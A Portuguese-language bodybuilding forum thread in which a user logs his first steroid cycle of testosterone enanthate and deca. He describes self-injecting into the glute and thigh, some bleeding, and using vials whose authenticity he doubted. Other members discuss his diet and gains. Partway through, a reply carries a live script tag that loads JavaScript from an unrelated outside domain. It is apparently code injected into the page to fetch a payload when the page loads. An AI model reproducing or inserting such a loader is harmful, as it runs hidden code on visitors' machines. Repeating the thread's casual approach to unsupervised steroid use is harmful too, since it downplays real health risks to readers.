Ir para conteúdo
  • Cadastre-se

Primeiro Ciclo: Enantato E Deca

Posts Recomendados

Relato: Aplicação do glúteo não da doendo nem vermelho, apenas coçando, normal? Hoje apliquei no vasto e finalmente fiz minha auto aplicação, tremi bastante, só q segurei firme a seringa e mandei só senti a picada da agulha, de resto foi tudo ok, sem dor alguma, agora só aquela sensação estranha na perna que sempre sinto.

Foto do local da aplicação, avalia ai galera fazendo favor;

15ttmp.jpg

Link para o comentário
Compartilhar em outros sites

Publicidade

Fala carinha

Posta mais uma foto de como voce está agora comparando com a do inicio do ciclo pois a foto de comparação da terceira semana não vi diferença não.

Qual o lab das suas drogas ? ta comendo bem ? treinando bem ? durmindo bem ?

Link para o comentário

Fala carinha

Posta mais uma foto de como voce está agora comparando com a do inicio do ciclo pois a foto de comparação da terceira semana não vi diferença não.

kkk....rodo todos os tópicos hj??

Link para o comentário

Fala carinha

Vou postar agora semana q vem, entrei na quinta semana agora, vou postar na sexta semana fotos, as drogas são Lander, eu senti q eu cresci, foi pouco mais cresci, só que minha banha da barrigada ta baixando, a dieta não to seguindo a risca não :/

Treino to fazendo abc2x e descanso acho q ta bom tbm, agora que começou as aulas vai ficar mais corrido mais acho q não atrapalhe.

Relato: Apliquei ontem no vasto e sangrou um pouco, até agora dor bem de leve, de resto tudo na mesma.

Link para o comentário

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Vou postar agora semana q vem, entrei na quinta semana agora, vou postar na sexta semana fotos, as drogas são Lander, eu senti q eu cresci, foi pouco mais cresci, só que minha banha da barrigada ta baixando, a dieta não to seguindo a risca não :/

Treino to fazendo abc2x e descanso acho q ta bom tbm, agora que começou as aulas vai ficar mais corrido mais acho q não atrapalhe.

Relato: Apliquei ontem no vasto e sangrou um pouco, até agora dor bem de leve, de resto tudo na mesma.

Entendi.

Cara, posta sua dieta ai pra gente dar uma olhada ou mesmo sua alimentação e tals .. creio que isso esteja influenciando nos seus ganhos tbm.

Doritos com coca-cola não deixa ninguém grande e vejo muitos aqui no forum tomando AEs sem se preocupar com a alimentação, que seria 70% dos resultados, então, não cometa o mesmo erro.

Só os anabols não fazem milagres.

Quando voce diz que cresceu, foi qto ? quais as medidas antes e depois ? seu peso aumentou quanto ? Na quinta semana eu ja tinha ganho 10Kg no meu ciclo de Durateston, por isso digo que algo está errado.

Posta as informações que pedi ai que mais gente vai te ajudar baseado nisso.

Link para o comentário

Entendi.

Cara, posta sua dieta ai pra gente dar uma olhada ou mesmo sua alimentação e tals .. creio que isso esteja influenciando nos seus ganhos tbm.

Doritos com coca-cola não deixa ninguém grande e vejo muitos aqui no forum tomando AEs sem se preocupar com a alimentação, que seria 70% dos resultados, então, não cometa o mesmo erro.

Só os anabols não fazem milagres.

Quando voce diz que cresceu, foi qto ? quais as medidas antes e depois ? seu peso aumentou quanto ? Na quinta semana eu ja tinha ganho 10Kg no meu ciclo de Durateston, por isso digo que algo está errado.

Posta as informações que pedi ai que mais gente vai te ajudar baseado nisso.

Vou postar a dieta depois, agora estou no serviço, mas eu to comendo limpo, no final de semana no máximo um x-bacon com coca, esse final de semana nem comi nada de lixo, mas tbm eu montei a dieta só que não to contando as calorias to tentando mandar as proteinas e a gordura, carbo eu mando mais no chute mesmo, meu peso ta nos 81kg mesmo, tinha subido pra 83, mais baixou de novo, em relação das drogas até fiquei com duvida ao conferir a autenticidade de dois bujões, mas usei assim mesmo, senti uma melhora no treino, pump ta bem loko, tão aparecendo veias que eu nunca tinha visto, parece que meu bf baixou, e ganhei medidas no braço (1cm) e na panturrilha (2cm) na barriga diminuiu uns (2cm), o resto não tiro medidas, ombro e trapézio tão saindo tbm. Obrigado pela ajuda.

Link para o comentário

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
  • Criar Novo...